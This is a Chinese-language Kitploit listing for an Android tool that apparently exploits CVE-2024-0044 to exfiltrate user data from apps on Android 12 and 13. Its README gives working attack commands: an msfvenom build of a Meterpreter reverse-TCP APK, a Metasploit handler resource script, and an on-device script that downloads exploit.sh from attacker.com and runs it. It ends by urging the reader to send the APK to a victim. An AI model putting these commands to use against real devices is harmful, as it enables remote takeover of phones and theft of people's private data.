Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
android_autorooter — 利用 CVE-2024-0044 漏洞从 Android 12 和 13 上的应用中远程窃取敏感用户数据 | Kitploit
工具/GitHubGitHub/scs-labrat/android_autorooter
Android安全漏洞利用框架Payload生成漏洞分析漏洞利用移动应用渗透测试数据泄露渗透测试
GitHubscs-labrat/android_autorooter

android_autorooter

利用 CVE-2024-0044 漏洞从 Android 12 和 13 上的应用中远程窃取敏感用户数据

查看仓库
76152年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Android Autorooter

[Autorooter]

这只是一条备忘录,更多是为了进一步探索以下工作的可能性: https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html https://tinyhack.com/2024/06/07/extracting-whatsapp-database-or-any-app-data-from-android-12-13-using-cve-2024-0044/?s=03 https://www.mobile-hacker.com/2024/06/17/exfiltrate-sensitive-user-data-from-apps-on-android-12-and-13-using-cve-2024-0044-vulnerability/

最终我想要一个可自行执行的 exploit,但还是一步一步来吧……

Give this a try

root@kitploit:~
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> R > payload.apk

创建资源脚本 execute_script.rc 来自动执行这些命令:

root@kitploit:~
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit -j
set AutoRunScript multi_console_command -rc /path/to/commands.rc

创建包含所需命令的资源脚本:

root@kitploit:~
cd /data/local/tmp
wget http://attacker.com/exploit.sh -O exploit.sh
chmod +x exploit.sh
./exploit.sh

使用资源脚本启动 Metasploit:

root@kitploit:~
msfconsole -r execute_script.rc

用以下命令开始搞事情:

root@kitploit:~
msfconsole -r execute_script.rc

现在你的监听器/载荷投递已经配置好了... 把那个 payload.apk 发给受害者吧…… 宝贝,让我们去拿 root 吧。

下载工具